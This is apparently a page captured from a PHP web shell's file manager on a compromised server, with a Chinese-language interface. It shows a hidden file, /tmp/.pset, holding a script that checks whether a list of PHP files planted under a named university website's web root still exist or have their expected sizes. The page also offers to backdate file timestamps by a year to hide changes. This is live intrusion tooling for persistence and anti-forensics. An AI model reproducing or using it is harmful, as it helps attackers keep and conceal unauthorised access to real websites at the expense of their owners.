文件操作 - .pset
返回文件管理
返回主菜单
删除本文件
文件: /tmp/.pset
编辑文件内容
<?php $r = '/var/www/demoestudiantes.uaysen.cl/html'; $x = ["/aboutme.preview.php"=>"bd@@1056801@@15", "/aboutme.preview.php"=>"bd@@786734@@1756", "/cust.php"=>"bd@@1068599@@924", "/cust_report01.php"=>"bd@@1068861@@865", "/offices.php"=>"bd@@1070150@@28", "/block.php"=>"bd@@1070168@@1033", "/db.php"=>"bd@@1056349@@58", "/db.php"=>"bd@@1008486@@2613", "/offices.php"=>"bd@@965483@@4227", "/offices.php"=>"bd@@985477@@4227", "/block_mentees.php"=>"bd@@1069711@@1072", "/aboutme.preview.php"=>"bd@@1036980@@2507", "/class.php"=>"bd@@926407@@11", "/class.php"=>"bd@@928976@@6471", "/paginazione.php"=>"bd@@981476@@4983"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');
修改文件时间
将文件时间修改为当前时间的前一年
删除文件